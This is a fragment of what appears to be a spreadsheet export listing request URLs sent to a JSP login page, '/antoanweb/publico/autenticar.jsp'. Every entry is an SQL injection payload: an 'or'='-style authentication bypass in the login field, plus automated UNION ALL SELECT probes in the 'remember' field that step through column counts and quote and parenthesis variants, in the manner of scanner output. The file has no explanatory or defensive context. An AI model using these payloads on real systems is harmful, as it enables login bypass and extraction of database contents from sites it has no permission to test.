    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("ifas"like"ifas&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("fzel"like"fzel&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("cckr"like"cckr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("ucbx"like"ucbx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("unlu"like"unlu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("lkqn"like"lkqn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("jmmo"like"jmmo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and((("agio"like"agio&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and((("xvht"like"xvht&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and((("gzqj"like"gzqj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("wwby"like"wwby&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("iedv"like"iedv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("ddtv"like"ddtv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("yxss"like"yxss&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("xbgr"like"xbgr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("gics"like"gics&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("opyd"like"opyd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null#and"acdv"like"acdv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and"yegk"like"yegk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and"nnbv"like"nnbv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and"pliu"like"pliu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"hdtk"like"hdtk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"oacw"like"oacw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"dkol"like"dkol&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"dutt"like"dutt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"meuv"like"meuv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"vibm"like"vibm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9127,9127,9127,9127,9127,9127,9127,9127,9127,9127,9127,9127#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6466,6466,6466,6466,6466,6466,6466,6466,6466,6466,6466,6466,6466#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9786,9786,9786,9786,9786,9786,9786,9786,9786,9786,9786,9786,9786,9786#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5759,5759,5759,5759,5759,5759,5759,5759,5759,5759,5759,5759,5759,5759,5759#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8097,8097,8097,8097,8097,8097,8097,8097,8097,8097,8097,8097,8097,8097,8097,8097#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9925,9925,9925,9925,9925,9925,9925,9925,9925,9925,9925,9925,9925,9925,9925,9925,9925#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6487,6487,6487,6487,6487,6487,6487,6487,6487,6487,6487,6487,6487,6487,6487,6487,6487,6487#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1142,1142,1142,1142,1142,1142,1142,1142,1142,1142,1142,1142,1142,1142,1142,1142,1142,1142,1142#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178,178#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9956,9956,9956,9956,9956,9956,9956,9956,9956,9956,9956#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3392,3392,3392,3392,3392,3392,3392,3392,3392,3392,3392,3392#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997,9997#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect289,289,289,289,289,289,289,289,289,289,289,289,289,289#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3834,3834,3834,3834,3834,3834,3834,3834,3834,3834,3834,3834,3834,3834,3834,3834#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8718,8718,8718,8718,8718,8718,8718,8718,8718,8718,8718,8718,8718,8718,8718,8718,8718,8718#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7708,7708,7708,7708,7708,7708,7708,7708,7708,7708,7708,7708,7708,7708,7708,7708,7708,7708,7708#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107,2107#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8080,8080,8080,8080,8080,8080,8080,8080,8080,8080,8080#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2775,2775,2775,2775,2775,2775,2775,2775,2775,2775,2775,2775#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218,1218#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227,6227#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2146,2146,2146,2146,2146,2146,2146,2146,2146,2146,2146,2146,2146,2146,2146#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121,8121#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2310,2310,2310,2310,2310,2310,2310,2310,2310,2310,2310,2310,2310,2310,2310,2310,2310#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734,2734#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89,89#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1821,1821,1821,1821,1821,1821,1821,1821,1821,1821,1821,1821,1821,1821,1821,1821,1821,1821,1821,1821#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1817,1817,1817,1817,1817,1817,1817,1817,1817,1817,1817#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028,3028#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5288,5288,5288,5288,5288,5288,5288,5288,5288,5288,5288,5288,5288#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1076,1076,1076,1076,1076,1076,1076,1076,1076,1076,1076,1076,1076,1076#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2822,2822,2822,2822,2822,2822,2822,2822,2822,2822,2822,2822,2822,2822,2822#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6661,6661,6661,6661,6661,6661,6661,6661,6661,6661,6661,6661,6661,6661,6661,6661#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5726,5726,5726,5726,5726,5726,5726,5726,5726,5726,5726,5726,5726,5726,5726,5726,5726#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529,9529#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954,4954#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009,7009#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7910,7910,7910,7910,7910,7910,7910,7910,7910,7910,7910#and(8651=8651&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264,5264#and(9251=9251&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1258,1258,1258,1258,1258,1258,1258,1258,1258,1258,1258,1258,1258#and(1022=1022&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112,2112#and(6209=6209&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3425,3425,3425,3425,3425,3425,3425,3425,3425,3425,3425,3425,3425,3425,3425#and(231=231&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8509,8509,8509,8509,8509,8509,8509,8509,8509,8509,8509,8509,8509,8509,8509,8509#and(8430=8430&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect215,215,215,215,215,215,215,215,215,215,215,215,215,215,215,215,215#and(8412=8412&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153,2153#and(2334=2334&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3311,3311,3311,3311,3311,3311,3311,3311,3311,3311,3311,3311,3311,3311,3311,3311,3311,3311,3311#and(8410=8410&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5568,5568,5568,5568,5568,5568,5568,5568,5568,5568,5568,5568,5568,5568,5568,5568,5568,5568,5568,5568#and(3165=3165&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect8142,8142,8142,8142,8142,8142,8142,8142,8142,8142,8142#and((8918=8918&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect5084,5084,5084,5084,5084,5084,5084,5084,5084,5084,5084,5084#and((1620=1620&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009#and((4664=4664&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect9607,9607,9607,9607,9607,9607,9607,9607,9607,9607,9607,9607,9607,9607#and((5260=5260&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect8450,8450,8450,8450,8450,8450,8450,8450,8450,8450,8450,8450,8450,8450,8450#and((6919=6919&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect4789,4789,4789,4789,4789,4789,4789,4789,4789,4789,4789,4789,4789,4789,4789,4789#and((2845=2845&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect2155,2155,2155,2155,2155,2155,2155,2155,2155,2155,2155,2155,2155,2155,2155,2155,2155#and((936=936&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect7042,7042,7042,7042,7042,7042,7042,7042,7042,7042,7042,7042,7042,7042,7042,7042,7042,7042#and((7040=7040&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249#and((6371=6371&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect3454,3454,3454,3454,3454,3454,3454,3454,3454,3454,3454,3454,3454,3454,3454,3454,3454,3454,3454,3454#and((88=88&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552#and(((5626=5626&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1568,1568,1568,1568,1568,1568,1568,1568,1568,1568,1568,1568#and(((9978=9978&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846,8846#and(((828=828&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect7818,7818,7818,7818,7818,7818,7818,7818,7818,7818,7818,7818,7818,7818#and(((3353=3353&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935#and(((7296=7296&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect4933,4933,4933,4933,4933,4933,4933,4933,4933,4933,4933,4933,4933,4933,4933,4933#and(((5177=5177&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957,3957#and(((1196=1196&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect5825,5825,5825,5825,5825,5825,5825,5825,5825,5825,5825,5825,5825,5825,5825,5825,5825,5825#and(((3612=3612&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1331,1331,1331,1331,1331,1331,1331,1331,1331,1331,1331,1331,1331,1331,1331,1331,1331,1331,1331#and(((9629=9629&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect6213,6213,6213,6213,6213,6213,6213,6213,6213,6213,6213,6213,6213,6213,6213,6213,6213,6213,6213,6213#and(((4146=4146&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect6135,6135,6135,6135,6135,6135,6135,6135,6135,6135,6135#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect7513,7513,7513,7513,7513,7513,7513,7513,7513,7513,7513,7513#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428,1428#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect4678,4678,4678,4678,4678,4678,4678,4678,4678,4678,4678,4678,4678,4678#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect5514,5514,5514,5514,5514,5514,5514,5514,5514,5514,5514,5514,5514,5514,5514#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect7973,7973,7973,7973,7973,7973,7973,7973,7973,7973,7973,7973,7973,7973,7973,7973#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345,6345#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect6888,6888,6888,6888,6888,6888,6888,6888,6888,6888,6888,6888,6888,6888,6888,6888,6888,6888#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8606,8606,8606,8606,8606,8606,8606,8606,8606,8606,8606,8606,8606,8606,8606,8606,8606,8606,8606#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect3883,3883,3883,3883,3883,3883,3883,3883,3883,3883,3883,3883,3883,3883,3883,3883,3883,3883,3883,3883#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect91,91,91,91,91,91,91,91,91,91,91#and('omrg'='omrg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7694,7694,7694,7694,7694,7694,7694,7694,7694,7694,7694,7694#and('juhz'='juhz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9031,9031,9031,9031,9031,9031,9031,9031,9031,9031,9031,9031,9031#and('xpkt'='xpkt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4892,4892,4892,4892,4892,4892,4892,4892,4892,4892,4892,4892,4892,4892#and('ydmt'='ydmt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351,4351#and('kmmy'='kmmy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3478,3478,3478,3478,3478,3478,3478,3478,3478,3478,3478,3478,3478,3478,3478,3478#and('gatj'='gatj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3041,3041,3041,3041,3041,3041,3041,3041,3041,3041,3041,3041,3041,3041,3041,3041,3041#and('nfdy'='nfdy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2831,2831,2831,2831,2831,2831,2831,2831,2831,2831,2831,2831,2831,2831,2831,2831,2831,2831#and('elar'='elar&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect730,730,730,730,730,730,730,730,730,730,730,730,730,730,730,730,730,730,730#and('wdju'='wdju&amp;modo=entrar</t>
  </si>
  <si>
